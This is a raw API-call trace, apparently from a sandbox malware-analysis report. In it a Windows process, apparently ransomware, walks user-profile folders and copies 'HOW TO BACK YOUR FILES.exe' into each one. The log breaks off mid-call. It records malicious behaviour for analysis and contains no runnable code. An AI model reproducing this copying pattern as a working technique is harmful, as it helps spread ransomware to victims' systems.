[0078.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.731] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.731] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0078.731] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.731] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.732] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.732] GetLastError () returned 0x0 [0078.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.732] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.732] CloseHandle (hObject=0xa4) returned 1 [0078.732] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.732] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.732] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.732] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.732] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.732] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0078.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.733] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.733] GetLastError () returned 0x0 [0078.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.733] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.733] CloseHandle (hObject=0xa4) returned 1 [0078.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.734] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.734] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.734] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.734] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.734] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.734] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.734] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.735] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.735] GetLastError () returned 0x0 [0078.735] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.735] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.735] CloseHandle (hObject=0xa4) returned 1 [0078.735] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.735] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.735] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.736] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.736] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.736] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.736] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.736] GetLastError () returned 0x0 [0078.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.736] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.736] CloseHandle (hObject=0xa4) returned 1 [0078.737] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.737] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.737] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.737] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.737] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.737] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.737] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.737] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.738] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.738] GetLastError () returned 0x0 [0078.738] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.738] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.738] CloseHandle (hObject=0xa4) returned 1 [0078.738] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.738] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.738] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.738] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.739] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.739] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.739] GetLastError () returned 0x0 [0078.739] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.739] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.739] CloseHandle (hObject=0xa4) returned 1 [0078.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.740] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.740] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.740] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0078.740] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.740] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.741] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.741] GetLastError () returned 0x0 [0078.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.741] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.741] CloseHandle (hObject=0xa4) returned 1 [0078.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.741] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.741] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.741] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.742] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.742] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.742] GetLastError () returned 0x0 [0078.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.742] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.743] CloseHandle (hObject=0xa4) returned 1 [0078.743] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.743] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.743] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.743] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.743] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.743] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.743] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.744] CreateFileW 